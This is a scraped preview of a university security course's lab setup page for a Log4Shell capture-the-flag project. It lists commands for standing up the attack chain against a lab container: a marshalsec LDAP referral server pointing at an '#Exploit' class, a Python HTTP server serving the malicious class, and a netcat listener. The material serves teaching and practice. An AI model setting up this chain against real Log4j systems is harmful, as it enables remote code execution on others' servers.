Setup _ CS 6035_LOG4

pdf

School

East Los Angeles College *

*We aren’t endorsed by this school

Course

300

Subject

Computer Science

Date

Apr 3, 2024

Type

pdf

Pages

3

Uploaded by BrigadierTank13536

Report
3/11/24, 11:33 PM Setup | CS 6035 https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Projects/Log4Shell/setup.html 1/3 CS 6035 Projects / Log4Shell / Setup To get setup for the flags, follow the steps carefully below, and be sure you are running each in a separate terminal window as noted. You will need switch users to login to log4j user via: In the home directory of log4j user, start the container with the start script: Open a new terminal window and go to “Desktop/log4shell/logs”: Run the following command to view the logs: OR to view System.out.println messages: You should now see the tail of the log file from the application running. Setup Credentials can be found in Canvas on the Log4Shell Assignment page ./StartContainer.sh cd Desktop/log4shell/logs tail -f cs6035.log tail -f console.log
3/11/24, 11:33 PM Setup | CS 6035 https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Projects/Log4Shell/setup.html 2/3 ** If the logs stop populating, then just stop and restart the tail. This is happening because the data logged gets too large so the log “rolls over” to another file. ** Open a new terminal window and run the following command to set the current directory to “Desktop/log4shell/target”: Next, start the LDAP server by running: You can get the ip address of the vm by running the block below in a terminal This outputs the vm’s IP It is very important that this matches the port specified in the Malicious server. If your exploit is not working because it is not connecting to the malicious server, your ports likely do not match OR the vm’s IP is not correct. You should see the following output: Open a new terminal and make sure the active directory is the directory that contains your malicious .class file. For simplicity, we have created “Desktop/log4shell/{flag_no}” for you to work in. Do not leave this directory . Run the server in “Desktop/log4shell/{flag_no}” by the following command: 1. Run the LDAP Server: cd ~Desktop/log4shell/target java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:4242/#Exploit ip addr show 127.0.0.1 2. Run the Malicious Server: python3 -m http.server 4242
3/11/24, 11:33 PM Setup | CS 6035 https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Projects/Log4Shell/setup.html 3/3 It is very important that this matches the port specified in the LDAP server. If your exploit is not working because it is not connecting to the malicious server, your ports likely do not match OR the vm’s IP is not correct You should see the following output: Open a terminal and run: You should see the following output: To print debug statements from your Java code, tail the ~/Desktop/log4shell/logs/console.log file and add System.out.println statements to your Exploit.java. Disclaimer: You are responsible for the information on this website. The content is subject to change at any time. 3. Read data that is flowing on the network (This step is required for Flag 2 but is optional for the rest): nc -nlvp <your_desired_port>
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help

Related Documents

M9 ASSIGNMENT.pptx
WEEK 5 sql m ASSIGNMENT.docx
hw2_C22 (1).pdf
M9 ASSIGNMENT SPEAKER NOTES.docx
2024.03.19 CS101 HW08.docx
HW1_C22.pdf
Discussion 8.docx
Assignment for Correlations in jamovi.pdf
PM Week - 5 Quizzes.docx
HW1.docx
Qiran Hu's writing assigment1.docx
GRT 3.02 DONE.docx
Recommended textbooks for you
Text book image
LINUX+ AND LPIC-1 GDE.TO LINUX CERTIF.
Computer Science
ISBN:9781337569798
Author:ECKERT
Publisher:CENGAGE L
Text book image
Np Ms Office 365/Excel 2016 I Ntermed
Computer Science
ISBN:9781337508841
Author:Carey
Publisher:Cengage
Text book image
EBK JAVA PROGRAMMING
Computer Science
ISBN:9781337671385
Author:FARRELL
Publisher:CENGAGE LEARNING - CONSIGNMENT
Text book image
COMPREHENSIVE MICROSOFT OFFICE 365 EXCE
Computer Science
ISBN:9780357392676
Author:FREUND, Steven
Publisher:CENGAGE L
Text book image
EBK JAVA PROGRAMMING
Computer Science
ISBN:9781305480537
Author:FARRELL
Publisher:CENGAGE LEARNING - CONSIGNMENT
Text book image
A+ Guide to Hardware (Standalone Book) (MindTap C...
Computer Science
ISBN:9781305266452
Author:Jean Andrews
Publisher:Cengage Learning
SEE MORE TEXTBOOKS
Recommended textbooks for you
Text book image
LINUX+ AND LPIC-1 GDE.TO LINUX CERTIF.
Computer Science
ISBN:9781337569798
Author:ECKERT
Publisher:CENGAGE L
Text book image
Np Ms Office 365/Excel 2016 I Ntermed
Computer Science
ISBN:9781337508841
Author:Carey
Publisher:Cengage
Text book image
EBK JAVA PROGRAMMING
Computer Science
ISBN:9781337671385
Author:FARRELL
Publisher:CENGAGE LEARNING - CONSIGNMENT
Text book image
COMPREHENSIVE MICROSOFT OFFICE 365 EXCE
Computer Science
ISBN:9780357392676
Author:FREUND, Steven
Publisher:CENGAGE L
Text book image
EBK JAVA PROGRAMMING
Computer Science
ISBN:9781305480537
Author:FARRELL
Publisher:CENGAGE LEARNING - CONSIGNMENT
Text book image
A+ Guide to Hardware (Standalone Book) (MindTap C...
Computer Science
ISBN:9781305266452
Author:Jean Andrews
Publisher:Cengage Learning
SEE MORE TEXTBOOKS